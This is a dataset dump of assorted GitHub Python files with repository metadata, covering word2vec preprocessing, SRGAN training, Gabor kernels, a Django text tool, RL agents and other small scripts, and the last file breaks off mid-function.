seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
39666743662 | # -*- coding: utf-8 -*-
"""
Created on Tue Feb 14 20:18:14 2017
@author: user
"""
import csv
import numpy as np
from gensim.models import word2vec
content_POS = list(np.load('all_content_POS.npy'))
"""取出n,a,d,v詞性的詞"""
sentiment_POS = []
sentiment_content = []
ADNV = [1,3,7,13]
for sentence in content_POS:
sen = []
for word in sentence:
if word[1] in ADNV:
sen.append(word)
if len(sen) != 0:
sentiment_POS.append(sen)
"""刪除停用詞"""
print("delete stopword")
stopwordset = set()
with open('stopwords.txt','r',encoding='utf-8') as sw:
stopwordset.add(' ')
for line in sw:
stopwordset.add(line.strip('\n'))
for sentence in sentiment_POS:
temp_sen = []
for word in sentence:
if word[0] not in stopwordset:
temp_sen.append(word[0])
sentiment_content.append(temp_sen)
f = open('sentiment_content.txt', 'w', encoding='utf-8')
spamwriter = csv.writer(f, lineterminator = '\n', delimiter=' ', quoting = csv.QUOTE_NONE)
spamwriter.writerows(sentiment_content)
f.close()
"""訓練詞向量"""
print("train word2vec")
sentences = word2vec.Text8Corpus('sentiment_content.txt')
model = word2vec.Word2Vec(sentences, size=250) # default sg = 0, use CBOW, hs = 0, use negative smapling
model.save_word2vec_format(u'med250.model.bin', binary=True)
"""bin檔轉txt,讀單詞向量"""
model = word2vec.Word2Vec.load_word2vec_format('med250.model.bin', binary=True)
model.save_word2vec_format('med250.model.txt', binary=False)
word_list = []
vec_list = []
f = open('med250.model.txt','r',encoding = 'utf-8')
for r,row in enumerate(csv.reader(f)):
if r==0:
line = row[0].split(' ')
total_num = int(line[0])
vec_len = int(line[1])
#np.save('total_num',total_num)
else:
line = row[0].split(' ')
word = line[0]
vec = []
for v in line[1:250]:
vec.extend([float(v)])
word_list.extend([word])
vec_list.append(vec)
np.save('word_list',word_list)
np.save('vec_list',vec_list)
f.close()
# word_vec = [list(np.load('word_list.npy')),np.load('vec_list.npy')]
| Maomaomaoing/Sacasm-Detection | 2.word2vector_pre.py | 2.word2vector_pre.py | py | 2,254 | python | en | code | 0 | github-code | 36 |
5491251302 | import sys
import os
sys.path.append(os.path.abspath('.'))
import torch
import utils as ut
from train import *
from dataset import load_train_data, load_test_data
import constants
def main(config):
    """Run the full SRGAN training loop described by *config*.

    Sets up generator/discriminator, optimizers and schedulers, optionally
    resumes from a checkpoint, then alternates train/test epochs and
    checkpoints both networks after every epoch.
    """
    # Fixed random number seed for reproducibility.
    torch.manual_seed(config.seed)
    torch.cuda.manual_seed_all(config.seed)

    # Best-so-far image evaluation metrics.
    best_psnr = 0.0
    best_ssim = 0.0

    if config.train.checkpoint.is_log:
        ut.log_on_train_start(log_name=config.exp_name, config=config)
    checkpoint_dir = os.path.join(constants.ROOT, 'model', config.exp_name)
    ut.create_dir(checkpoint_dir)

    # Define basic elements for training.
    netG, netD = define_model(config)
    # optimG = define_optimizer(netG, config)
    # optimD = define_optimizer(netD, config)
    optimG = optim.Adam(netG.parameters(),
                        lr=config.train.optim.lr,
                        betas=config.train.optim.betas)
    optimD = optim.Adam(netD.parameters(),
                        lr=config.train.optim.lr,
                        betas=config.train.optim.betas)
    schedulerG = define_scheduler(optimG, config)
    schedulerD = define_scheduler(optimD, config)

    # Optionally resume model + optimizer state from saved checkpoints.
    if config.train.checkpoint.load_model:
        G_state_dict, optimG_state_dict, start_epoch = ut.load_checkpoint(config.train.checkpoint.gen)
        D_state_dict, optimD_state_dict, start_epoch = ut.load_checkpoint(config.train.checkpoint.disc)
        netG.load_state_dict(G_state_dict)
        netD.load_state_dict(D_state_dict)
        optimG.load_state_dict(optimG_state_dict)
        optimD.load_state_dict(optimD_state_dict)

    # Loss functions: pixel-wise MSE, adversarial BCE, and a frozen VGG
    # feature extractor for the perceptual loss.
    content_criteria = nn.MSELoss()
    adversarial_criteria = nn.BCEWithLogitsLoss()
    feature_extractor = VGGLoss()
    feature_extractor = feature_extractor.to(constants.DEVICE)
    feature_extractor.eval()

    # Data loaders.
    print("Loading data ...")
    train_loader = load_train_data(root=config.train.dataset.data_dir, batch_size=config.train.hyp.batch_size)
    test_loader = load_test_data(hr_root=config.test.dataset.hr_dir, lr_root=config.test.dataset.lr_dir)
    print("Finish loading data")

    for epoch in range(config.train.hyp.num_epoch):
        netG.train()
        netD.train()
        D_loss, G_loss = train(
            train_loader,
            epoch,
            netG,
            netD,
            optimG,
            optimD,
            content_criteria,
            adversarial_criteria,
            feature_extractor,
            config)
        schedulerD.step()
        schedulerG.step()

        psnr, ssim = test(test_loader, netG)
        # BUG FIX: the original tested `ssim > best_psnr`; each metric must be
        # compared against its own record for "best" to mean anything.
        is_best = psnr > best_psnr and ssim > best_ssim
        best_psnr = max(psnr, best_psnr)
        best_ssim = max(ssim, best_ssim)
        print("D_loss: %.6f, G_loss: %.6f, psnr: %.6f, ssim: %.6f" % (D_loss, G_loss, psnr, ssim))

        # Checkpoint both networks; `is_best` additionally refreshes *_best.
        ut.save_checkpoint(
            {
                "epoch": epoch + 1,
                "model": netD.state_dict(),
                "optimizer": optimD.state_dict(),
            },
            f'{checkpoint_dir}/disc_{epoch+1}.pth.tar',
            f'{checkpoint_dir}/disc_best.pth.tar',
            is_best)
        ut.save_checkpoint(
            {
                "epoch": epoch + 1,
                "model": netG.state_dict(),
                "optimizer": optimG.state_dict(),
            },
            f'{checkpoint_dir}/gen_{epoch+1}.pth.tar',
            f'{checkpoint_dir}/gen_best.pth.tar',
            is_best)
if __name__ == '__main__':
    # Load the experiment YAML config and launch training.
    config_path = os.path.join(constants.ROOT, 'config/config.yaml')
    main(ut.read_config(config_path))
| daoduyhungkaistgit/SRGAN | src/main.py | main.py | py | 3,641 | python | en | code | 3 | github-code | 36 |
38164677251 | import math
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import gridspec
from scipy.special import factorial
from plot.plot_data import plot_matrixImage
def normalize(X):
    """Linearly rescale *X* so its values span [0, 1]."""
    lo, hi = X.min(), X.max()
    return (X - lo) / (hi - lo)
def gabor_kernel_2(frequency, sigma_x, sigma_y, theta=0, offset=0, ks=61):
    """Build a ks x ks Gabor kernel: a rotated Gaussian envelope modulated
    by a cosine carrier of the given spatial *frequency*."""
    half = np.floor(ks / 2)
    y, x = np.mgrid[-half:half + 1, -half:half + 1]
    # Rotate the coordinate frame by theta.
    rot_x = x * np.cos(theta) + y * np.sin(theta)
    rot_y = -x * np.sin(theta) + y * np.cos(theta)
    # Normalised Gaussian envelope.
    envelope = np.exp(-0.5 * (rot_x ** 2 / sigma_x ** 2 + rot_y ** 2 / sigma_y ** 2))
    envelope /= 2 * np.pi * sigma_x * sigma_y
    # Modulate with the cosine carrier along the rotated x axis.
    return envelope * np.cos(2 * np.pi * frequency * rot_x + offset)
def gabor_kernel_3(frequency, x_c, y_c, sigma_x, sigma_y, theta=0, offset=0, ks=61, scale=1):
    """Gabor kernel with its centre shifted to (x_c, y_c) and the result
    multiplied by *scale*; otherwise identical to gabor_kernel_2."""
    half = np.floor(ks / 2)
    y, x = np.mgrid[-half:half + 1, -half:half + 1]
    # Shift the centre, then rotate the coordinate frame by theta.
    rot_x = (x - x_c) * np.cos(theta) + (y - y_c) * np.sin(theta)
    rot_y = -(x - x_c) * np.sin(theta) + (y - y_c) * np.cos(theta)
    envelope = np.exp(-0.5 * (rot_x ** 2 / sigma_x ** 2 + rot_y ** 2 / sigma_y ** 2))
    envelope /= 2 * np.pi * sigma_x * sigma_y
    return envelope * np.cos(2 * np.pi * frequency * rot_x + offset) * scale
def poisson(k, lamb):
    """Poisson pmf at *k*; parameter *lamb* is the fit parameter (rate)."""
    return np.exp(-lamb) * lamb ** k / factorial(k)


def negLogLikelihood(params, data):
    """Negative log-likelihood of *data* under a Poisson(params[0]) model."""
    return -np.sum(np.log(poisson(data, params[0])))
# def tfm_poisson_pdf(x, mu):
# y, J = transformation_and_jacobian(x)
# # For numerical stability, compute exp(log(f(x)))
# return np.exp(y * np.log(mu) - mu - gammaln(y + 1.)) * J
def plot_conv_weights(weights, model_name):
    """Tile a 4-D conv weight array into one 2-D mosaic, min-max normalise
    it, and save it as an image via plot_matrixImage.

    Assumes weights is indexed [i, j, :, :] with square kernels -- TODO
    confirm the (out, in, k, k) layout against the caller.
    """
    length = weights.shape[0] * weights.shape[2]
    matrix = np.zeros([length, 0])
    for i in range(0, weights.shape[0]):
        # Stack all kernels of row i vertically ...
        row = np.empty([0, weights.shape[2]])
        for j in range(0, weights.shape[1]):
            row = np.concatenate((row, weights[i, j]), axis=0)
            # f_min, f_max = np.min(row), np.max(row)
            # row = (row - f_min) / (f_max - f_min)
            # row[0,0] = 0
        # ... then append the column to the mosaic.
        matrix = np.concatenate((matrix, row), axis=1)
    # matrix[0,0] = 1
    # Normalise the full mosaic to [0, 1] before plotting.
    f_min, f_max = np.min(matrix), np.max(matrix)
    matrix = (matrix - f_min) / (f_max - f_min)
    plot_matrixImage(matrix, 'weights_' + model_name)
def plot_weights(weights, model_name, gs=None, name=None):
    """Show each 2-D kernel in *weights* as a grayscale tile in a grid.

    When *gs* is None a standalone figure is created, saved as
    weights_<model_name>.png and shown; otherwise the tiles are drawn
    inside the supplied gridspec cell (fixed 8 columns in that case).
    """
    show = False
    if gs is None:
        plt.figure(figsize=(10, 2), frameon=False)
        inner = gridspec.GridSpec(weights.shape[0], weights.shape[1], wspace=0.2, hspace=0.2)
        show = True
    else:
        inner = gridspec.GridSpecFromSubplotSpec(weights.shape[0], 8,
                                                 subplot_spec=gs, wspace=0.1, hspace=0.1)
    # gs = gridspec.GridSpec(, width_ratios=[1] * weights.shape[1],
    #                        wspace=0.5, hspace=0.5, top=0.95, bottom=0.05, left=0.1, right=0.95)
    idx = 0
    for i in range(0, weights.shape[0]):
        for j in range(0, weights.shape[1]):
            kernel1 = weights[i, j]
            ax_ = plt.subplot(inner[i, j])
            ax_.set_xticks([])
            ax_.set_yticks([])
            ax_.set_axis_off()
            ax_.imshow(kernel1, cmap='gray')
            #
            idx += 1
            if j == 0:
                # Label the first tile of each row with the given name.
                ax_.set_title(name, pad=10, weight='semibold', size=16)
    if show:
        plt.tight_layout()
        plt.savefig(f'weights_{model_name}.png')
        plt.show()
def show_kernels(weights, func_name, gs=None):
    """Render conv kernels as colour tiles, each min-max normalised.

    *weights* is transposed from (out, in, k, k) to channels-last for
    imshow -- TODO confirm the input layout. With gs=None the figure is
    saved as kernels_<func_name>.png and shown.
    """
    number = math.ceil(math.sqrt(weights.shape[0]))
    img = np.transpose(weights, (0, 2, 3, 1))  # channels-last for imshow
    idx = 0
    show = False
    if gs is None:
        plt.figure(figsize=(10, 10))
        inner = gridspec.GridSpec(1, weights.shape[0], wspace=0.2, hspace=0.2)
        show = True
    else:
        inner = gridspec.GridSpecFromSubplotSpec(1, 8,
                                                 subplot_spec=gs, wspace=0.1, hspace=0.1)
    # fig, axes = pyplot.subplots(ncols=weights.shape[0], figsize=(20, 4))
    for j in range(weights.shape[0]):  # in zip(axes, range(weights.shape[0])):
        # for i in range(number):
        ax_ = plt.subplot(inner[idx])
        ax_.set_xticks([])
        ax_.set_yticks([])
        ax_.set_axis_off()
        # ax.set_title(f'Kernel {idx}', pad=3)
        # imgs = img[range(j*8, (j*8)+number)]
        channel = img[idx]
        # Normalise each kernel independently to [0, 1].
        f_min, f_max = channel.min(), channel.max()
        channel = (channel - f_min) / (f_max - f_min)
        ax_.imshow(channel)
        if j == 0:
            ax_.set_title(func_name, pad=10, weight='bold', size=18)
        idx += 1
    if show:
        plt.tight_layout()
        plt.savefig(f'kernels_{func_name}.png')
        plt.show()
def similarity(m1, m2):
    """Mean absolute element-wise difference between two equal-shape arrays.

    Vectorised replacement for the original O(rows*cols) Python double loop;
    identical result, and no longer shadows the built-in ``sum``.
    """
    return np.abs(m1 - m2).mean()
| franzigeiger/training_reductions | utils/gabors.py | gabors.py | py | 5,020 | python | en | code | 3 | github-code | 36 |
18550396896 | from django.http import HttpResponse
from django.shortcuts import render
def index(request):
    """Render the home page."""
    # params = {'name': 'Tarbi'}
    return render(request, "index.html")
def analyze(request):
    """Apply the text operations selected in the submitted form, in a fixed
    order, and render the result page.

    Each enabled operation transforms `djtext` in sequence; `params` is
    overwritten each time, so the page shows the *last* operation's label
    with the cumulative result.
    """
    # Get the text
    djtext = request.POST.get('text','default')
    # Operations: each checkbox posts the string "on" when ticked.
    removepunc = request.POST.get('removepunc','default')
    fullcaps = request.POST.get('fullcaps','default')
    count = request.POST.get('count','default')
    newlineremover = request.POST.get('newlineremover','default')
    spaceremover = request.POST.get('spaceremover','default')
    # Result text
    analyzed = ""
    if removepunc == "on":
        punctuations = '''!()-[]{};:'"\,<>./?@#$%^&*_~'''
        analyzed = ""
        for char in djtext:
            if char not in punctuations:
                analyzed = analyzed + char
        params = {'purpose': 'Remove Punctuations', 'analyzed_text': analyzed,'input_text': djtext}
        djtext = analyzed  # feed the result into the next operation
        #return render(request, 'analyze.html', params)
    if fullcaps == "on":
        analyzed = djtext.upper()
        params = {'purpose': 'To Upper Case', 'analyzed_text': analyzed, 'input_text': djtext}
        djtext = analyzed
        #return render(request, 'analyze.html', params)
    if count == "on":
        # NOTE(review): despite the name, this branch *removes* digits;
        # `cnt` is assigned but never used.
        cnt = 0
        analyzed = ""
        for x in djtext:
            if(x.isdigit()):
                continue
            analyzed+=x
        params = {'purpose': 'Number Remover', 'analyzed_text': analyzed, 'input_text': djtext}
        djtext = analyzed
        #return render(request, 'analyze.html', params)
    if newlineremover == "on":
        analyzed = ""
        for x in djtext:
            if x != '\n' and x!='\r':
                analyzed+=x
        params = {'purpose': 'New Line Remove', 'analyzed_text': analyzed, 'input_text': djtext}
        djtext = analyzed
        #return render(request, 'analyze.html', params)
    if spaceremover =="on":
        analyzed =""
        for x in djtext:
            if(x!=' '):
                analyzed+=x
        params = {'purpose': 'Space Remove', 'analyzed_text': analyzed, 'input_text': djtext}
        djtext = analyzed
    # No operation selected: bail out before `params` is referenced.
    if spaceremover !="on" and newlineremover != "on" and count != "on" and fullcaps != "on" and removepunc != "on":
        return HttpResponse("Select any option and try again")
    return render(request, 'analyze.html', params)
def about(request):
    """Render the static 'about' page."""
    return render(request, 'about.html')


def contact(request):
    """Render the static 'contact' page."""
    return render(request, 'contact.html')
| Bibhash7/Textlyzer | mysite/views.py | views.py | py | 2,508 | python | en | code | 0 | github-code | 36 |
17653061247 | import numpy as np
from inet.models.solvers.tf_lite import MultiTaskModel
from inet.models.tf_lite.tflite_methods import evaluate_interpreted_model
class TwoStageModel(MultiTaskModel):
    """
    Object detection model using dependent/sequential methods to solve the localization and classification tasks.
    A regressor predicts the location, the original input image gets cropped to a patch containing the extracted
    Bounding Box. Afterwards a classifier predicts the class label, based on the cropped input.
    [Similar to `IndependentModel`]

    Example:
        >>> from tensorflow.keras.applications.mobilenet import MobileNet
        >>> from inet.models.architectures.classifier import Classifier
        >>> from inet.models.architectures.bounding_boxes import BoundingBoxRegressor
        >>> clf_backbone = MobileNet(weights='imagenet', include_top=False, input_shape=(224, 224))
        >>> reg_backbone = MobileNet(weights='imagenet', include_top=False, input_shape=(224, 224))
        >>> regressor = BoundingBoxRegressor(reg_backbone)
        >>> classifier = Classifier(clf_backbone)
        >>> solver = TwoStageModel(regressor, classifier, (224, 224, 3), False)
    """
    ## Name of model architecture
    model_name = 'two-stage-model'

    def predict(self, X):
        """
        Performs dependent predictions on input `X`.

        Regressor receives raw `X` -> returns `c`
        `X` is cropped using `c` -> `X_hat`
        Classifier receives `X_hat` -> returns `y`

        :param X: vector of input images
        :return: Prediction Tuple [y, c]
        """
        # Stage 1: bounding-box regression (TF-Lite interpreter or Keras model).
        if self.is_tflite:
            bbs = evaluate_interpreted_model(self.regressor, X)
            # Flatten interpreter output to one row of box coords per image.
            bbs = np.array(bbs).reshape((len(bbs), -1))
        else:
            bbs = self.regressor.predict(X)
        # Crop each image to its predicted box before classification.
        cropped_images = np.array([i for i in map(self.crop_image, zip(X.copy(), bbs.copy()))])
        # Stage 2: classification on the crops; concat labels with boxes.
        if self.is_tflite:
            clf = evaluate_interpreted_model(self.classifier, cropped_images)
            clf = np.array(clf).reshape((len(clf), -1))
            return np.c_[clf, bbs]
        classifications = self.classifier.predict(cropped_images)
        return np.c_[classifications, bbs]
| philsupertramp/inet | inet/models/solvers/two_stage.py | two_stage.py | py | 2,210 | python | en | code | 0 | github-code | 36 |
12678425581 | import csv
from dateutil.parser import parse
from decimal import *
import pandas as pd
import gc
import os
from multiprocessing import Process
def intersection(list1, list2):
    """Return the elements of *list1* that also occur in *list2*, keeping
    list1's order and duplicates.

    Uses a set for membership tests: O(len1 + len2) instead of the original
    O(len1 * len2) scan, which matters on large author lists.
    """
    members = set(list2)
    return [item for item in list1 if item in members]
def get_project_info():
    """Stream big_snapshot_.csv (columns: commit timestamp, author id) and
    append one row of aggregate git metrics for the snapshot to
    project-git-metrics-first.csv.

    For each of three window sizes (day/week/month) it tracks the commit
    frequency (commit records plus zero-fill for empty windows) and the set
    of contributors present in every consecutive window.
    """
    snapshot_id = 60295045
    one_day = 86400       # window sizes in seconds
    one_week = 604800
    one_month = 2628000
    cnt = 0
    min_date = 1165524100  # presumably the epoch time of the first commit -- TODO confirm
    total_commits = 0
    authors = []
    daily_cnt = 1
    daily_commits = []
    daily_contributors = []
    daily_temp_contrib = []
    weekly_cnt = 1
    weekly_commits = []
    weekly_contributors = []
    weekly_temp_contrib = []
    monthly_cnt = 1
    monthly_commits = []
    monthly_contributors = []
    monthly_temp_contrib = []
    # Read in 1M-row chunks to bound memory on large histories.
    for lines in pd.read_csv('/home/sv/big_snapshot_.csv', encoding='utf-8', header=None, chunksize=1000000):
        for line in lines.iterrows():
            author = int(line[1][1])
            date = int(line[1][0])
            cnt += 1
            print(cnt)
            total_commits += 1
            if author not in authors:
                authors.append(author)
            #daily
            if author not in daily_contributors and date <= min_date + one_day:
                daily_contributors.append(author)
            if date <= min_date + one_day*daily_cnt:
                # Still inside the current day window: collect the author.
                if author not in daily_temp_contrib:
                    daily_temp_contrib.append(author)
            else:
                # Window closed: keep only authors seen in both windows.
                daily_contributors = intersection(daily_contributors, daily_temp_contrib)
                daily_temp_contrib = []
                daily_cnt += 1
                # Zero-fill any fully empty days between windows.
                while date > min_date + one_day*daily_cnt:
                    daily_commits.append(0)
                    daily_contributors = []
                    daily_cnt += 1
                daily_temp_contrib.append(author)
            daily_commits.append(1)
            #weekly (same pattern as daily, one-week windows)
            if author not in weekly_contributors and date <= min_date + one_week:
                weekly_contributors.append(author)
            if date <= min_date + one_week*weekly_cnt:
                if author not in weekly_temp_contrib:
                    weekly_temp_contrib.append(author)
            else:
                weekly_contributors = intersection(weekly_contributors, weekly_temp_contrib)
                weekly_temp_contrib = []
                weekly_cnt += 1
                while date > min_date + one_week*weekly_cnt:
                    weekly_commits.append(0)
                    weekly_contributors = []
                    weekly_cnt += 1
                weekly_temp_contrib.append(author)
            weekly_commits.append(1)
            #monthly (same pattern, one-month windows)
            if author not in monthly_contributors and date <= min_date + one_month:
                monthly_contributors.append(author)
            if date <= min_date + one_month*monthly_cnt:
                if author not in monthly_temp_contrib:
                    monthly_temp_contrib.append(author)
            else:
                monthly_contributors = intersection(monthly_contributors, monthly_temp_contrib)
                monthly_temp_contrib = []
                monthly_cnt += 1
                while date > min_date + one_month*monthly_cnt:
                    monthly_commits.append(0)
                    monthly_contributors = []
                    monthly_cnt += 1
                monthly_temp_contrib.append(author)
            monthly_commits.append(1)
    #writing to file
    # Frequency = commit records / (commit records + empty windows).
    daily_freq = Decimal(sum(daily_commits))/Decimal(len(daily_commits))
    weekly_freq = Decimal(sum(weekly_commits))/Decimal(len(weekly_commits))
    monthly_freq = Decimal(sum(monthly_commits))/Decimal(len(monthly_commits))
    df = pd.DataFrame({
        'snapshot_id': [snapshot_id],
        'total_commits': [total_commits],
        'total_authors': [len(authors)],
        'daily_freq': [daily_freq],
        'daily_contributors': [len(daily_contributors)],
        'weekly_freq': [weekly_freq],
        'weekly_contributors': [len(weekly_contributors)],
        'monthly_freq': [monthly_freq],
        'monthly_contributors': [len(monthly_contributors)]
    })
    # Append (no header) so repeated runs accumulate rows.
    df.to_csv('/home/sv/project-git-metrics-first.csv', mode = 'a', header = False, index = False)
if __name__ == '__main__':
    # One-shot metrics extraction when invoked as a script.
    get_project_info()
39883705611 | import numpy as np
import matplotlib
matplotlib.use('Agg')  # headless backend: render straight to file
import matplotlib.pyplot as plt

# Altitude plus the two K_up rate columns (indices 5799/5800 shifted by the
# leading column); the data file has 3 header rows.
h, k_up1, k_up2 = np.loadtxt('./Reactions/Kup.dat',skiprows=3,usecols=(1,5799+1,5800+1),unpack=True)
h *= 1e-5  # unit conversion of altitude (presumably cm -> km -- TODO confirm)
k_up = k_up1 + k_up2  # total upward rate: sum of the two branches
plt.xscale('log')
plt.plot(k_up,h,'k-')
plt.savefig('./N2O-rates.pdf',bbox_inches='tight')
| aheays/spectr_examples | argo/data/early_earth/out/plot-k.py | plot-k.py | py | 320 | python | en | code | 0 | github-code | 36 |
18482571232 | import math
import torch.nn as nn
class HRNET_NECK(nn.Module):
    """FPN-style neck over four HRNet stages: 1x1 lateral convs project each
    stage to `feature_size` channels, strided 3x3 convs cascade the shallower
    levels downward, yielding the P3..P7 pyramid for the detection head."""

    def __init__(self, in_channels, feature_size=256):
        super(HRNET_NECK, self).__init__()
        c2_ch, c3_ch, c4_ch, c5_ch = in_channels

        def lateral(in_ch):
            # 1x1 conv projecting a backbone stage to `feature_size` channels.
            return nn.Conv2d(in_ch, feature_size, kernel_size=1, stride=1, padding=0)

        def downsample():
            # 3x3 stride-2 conv halving the spatial resolution.
            return nn.Conv2d(feature_size, feature_size, kernel_size=3, stride=2, padding=1)

        # P2
        self.P2_1 = lateral(c2_ch)
        self.P2_2 = downsample()
        # P3
        self.P3_1 = lateral(c3_ch)
        self.P3_2 = downsample()
        # P4
        self.P4_1 = lateral(c4_ch)
        self.P4_2 = downsample()
        # P5
        self.P5_1 = lateral(c5_ch)
        # "P6 is obtained via a 3x3 stride-2 conv on C5"
        self.P6 = downsample()
        # "P7 is computed by applying ReLU followed by a 3x3 stride-2 conv on P6"
        self.P7_1 = nn.ReLU()
        self.P7_2 = downsample()

        # He-style initialisation of convs; BatchNorm (none here) to identity.
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
                m.weight.data.normal_(0, math.sqrt(2. / fan_out))
            elif isinstance(m, nn.BatchNorm2d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()

    def forward(self, inputs):
        C2, C3, C4, C5 = inputs
        # Cascade each lateral projection with the downsampled level above it.
        p2 = self.P2_1(C2)
        p3 = self.P3_1(C3) + self.P2_2(p2)
        p4 = self.P4_1(C4) + self.P3_2(p3)
        p5 = self.P5_1(C5) + self.P4_2(p4)
        p6 = self.P6(p5)
        p7 = self.P7_2(self.P7_1(p6))
        return [p3, p4, p5, p6, p7]
| TWSFar/FCOS | models/necks/hrnet_neck.py | hrnet_neck.py | py | 2,155 | python | en | code | 1 | github-code | 36 |
5675989650 | import sys
input = sys.stdin.readline  # fast stdin reads for competitive judging

# BOJ 2667 "house complexes": read an n x n 0/1 grid, flood-fill each
# 4-connected component of 1s, print the component count and then each
# component's size in ascending order.
n = int(input())
graph = []
move = [[-1, 0], [1, 0], [0, -1], [0, 1]]  # up, down, left, right
ans = []
number = 0
for _ in range(n):
    graph.append([int(i) for i in (input().strip())])

def dfs(x, y, initial):
    """Flood-fill from (x, y); accumulates the component size in the
    global `cnt` (cells are zeroed as they are visited)."""
    global cnt
    cnt = initial
    graph[x][y] = 0  # mark visited
    for i in move:
        next_x = x + i[0]
        next_y = y + i[1]
        if 0 <= next_x < n and 0 <= next_y < n and graph[next_x][next_y] == 1:
            cnt += 1
            dfs(next_x, next_y, cnt)

for x in range(n):
    for y in range(n):
        if graph[x][y] == 1:
            dfs(x, y, 1)   # after the call, `cnt` holds the component size
            number += 1
            ans.append(cnt)
print(number)
print("\n".join(str(i) for i in sorted(ans))) | origin1508/algorithm | 백준/Silver/2667. 단지번호붙이기/단지번호붙이기.py | 단지번호붙이기.py | py | 707 | python | en | code | 0 | github-code | 36 |
70280734825 | """
String reversing. What could be simpler?
Usage:
python string_reverse.py <string_to_reverse>
"""
import sys
def string_reverse(input_string):
    """Return *input_string* reversed.

    Uses slicing instead of the original character-by-character prepend
    loop, which allocated a new string per character (quadratic time).
    """
    return input_string[::-1]
if __name__ == '__main__':
    # Require exactly one argument: the string to reverse.
    if len(sys.argv) < 2:
        sys.stderr.write('This util needs some input: ./string_reverse.py string_to_reverse\n')
        sys.exit()
    input_string = sys.argv[1]
    # Extra arguments are tolerated but ignored, with a warning.
    if len(sys.argv) > 2:
        sys.stderr.write('Warning: the second and the following arguments ignored\n')
    sys.stdout.write('Initial string: {}\n'.format(input_string))
sys.stdout.write('Reversed string: {}\n'.format(string_reverse(input_string))) | AlexDobrushskiy/testing | string_reverse.py | string_reverse.py | py | 699 | python | en | code | 0 | github-code | 36 |
8860920055 | from collections import defaultdict
import Policy as policy
import random
import numpy as np
import matplotlib.pyplot as plt
# import pytorch as torch
class Agent:
    """Base agent: holds the environment, a replay buffer and the set of
    visited states; subclasses override next() to act."""

    def __init__(self, env) -> None:
        self.env = env
        # replay_buffer = {(state, action) : (state_, reward)}
        # NOTE(review): `lambda: tuple(list, float)` is not a valid zero-arg
        # default factory -- tuple() takes at most one argument, so reading a
        # missing key raises TypeError; confirm the intended default.
        self.replay_buffer = defaultdict(lambda : tuple(list, float))
        # visisted_states = {state}
        # NOTE(review): attribute is spelled "visisted_states"; ManualAgent
        # appends to "visited_states", which is never initialised here.
        self.visisted_states = set()
        self.state = self.env.reset()

    # Decide an action from a given state
    # Returns True if the environment is done (won or lost)
    def next(self) -> bool:
        return False
# Shallow agent for discrete environments or continuous environments with a small state space
class ShallowAgent(Agent):
    def __init__(self, env) -> None:
        super().__init__(env)
        # self.v = {state : value} -- tabular state-value function, default 0
        self.V = defaultdict(lambda : 0)
        # self.q = {(state, action) : value} -- tabular action-value function, default 0
        self.Q = defaultdict(lambda : 0)
# Deep agent for continuous environments or discrete environments with a large state space
class DeepAgent(Agent):
    def __init__(self, env, weight_size) -> None:
        super().__init__(env)
        # Weight vector for function approximation; torch version disabled.
        # self.w = torch.rand(weight_size)
class DiscreteQLearningAgent(Agent):
    """Placeholder for a tabular Q-learning agent; no behaviour beyond Agent yet."""
    def __init__(self, env) -> None:
        super().__init__(env)
class DiscreteActionValueIterationAgent(Agent):
    """Agent that performs one sweep of action-value iteration followed by one
    sweep of value iteration per next() call (discount factor 0.99)."""

    def __init__(self, env, policy = policy.random) -> None:
        super().__init__(env)
        self.policy = policy  # callable (env, state, q) -> {action: probability}

    def next(self) -> bool:
        # Action value iteration function
        # NOTE(review): self.q is read inside this sweep before self.q is
        # ever assigned, so the very first call raises AttributeError unless
        # a subclass/caller seeds it -- confirm.
        q = defaultdict(lambda : 0)
        for state in self.env.get_states():
            for action in self.env.A(state):
                trans_prob = self.env.get_transistion_probabilities(state, action)
                temp = 0
                # Expected return over (next_state, reward) outcomes.
                for next_state, reward in trans_prob:
                    pi = self.policy(self.env, next_state, self.q)
                    temp += trans_prob[(next_state, reward)]*(reward + 0.99*sum([pi[action_] * self.q[(next_state,action_)] for action_ in self.env.A(next_state)]))
                q[(state,action)] = temp
        self.q = q
        # Value iteration function
        v = defaultdict(lambda : 0)
        for state in self.env.get_states():
            actions = self.env.A(state)
            for action in actions:
                pi = 1/len(actions)  # uniform prior; overwritten by the policy below
                temp = 0
                trans_prob = self.env.get_transistion_probabilities(state, action)
                # Get reward, next state
                for next_state, reward in trans_prob.keys():
                    temp += trans_prob[(next_state,reward)]*(reward + 0.99*self.v[next_state])
                pi = self.policy(self.env, state, self.q)
                v[state] += pi[action] * temp
        self.v = v
        return True
class ManualAgent(Agent):
    """Interactive agent: prompts a human for the next action on stdin."""

    def __init__(self, env) -> None:
        super().__init__(env)

    def next(self):
        # Loop until a valid action is taken (True) or the user exits (False).
        while(True):
            print("Current state: " + str(self.env.state))
            print("Total reward: " + str(self.env.get_accumulative_reward(self)))
            print("---------------")
            print("Enter next action")
            print("Avaliable actions: " + str(self.env.A(self.state)))
            try:
                action = input()
                if action == "exit":
                    return False
                action = int(action)
                print("\n")
                # NOTE(review): validity check only compares against the last
                # (largest) action id; gaps in the action list are not caught.
                if(action <= self.env.A(self.state)[-1]):
                    next_state, reward = self.env.step(self.state, action)
                    self.state = next_state
                    # NOTE(review): these three attributes are never
                    # initialised anywhere (Agent defines "visisted_states"),
                    # so this path raises AttributeError as written -- confirm.
                    self.visited_states.append(self.state)
                    self.previous_actions.append(action)
                    self.obtained_rewards.append(reward)
                    print("---------------")
                    print("Reward: " + str(reward))
                    print("---------------")
                    return True
                else:
                    print("Invalid action")
            except ValueError:
                print("The provided string is not a valid representation of an integer.\n"+
                      "Please enter a valid integer in the action space")
| TheGoldenChicken/robust-rl | rl/agent.py | agent.py | py | 4,660 | python | en | code | 0 | github-code | 36 |
35938489743 | COUNT=0
count2=0
#history=[1,1,0,0]

def q1(history):
    """Exact permutation test: enumerate every permutation of *history*,
    count those containing an adjacent equal pair (count2) out of all
    permutations (COUNT), print and return the resulting p-value."""
    def perm(n,begin,end):
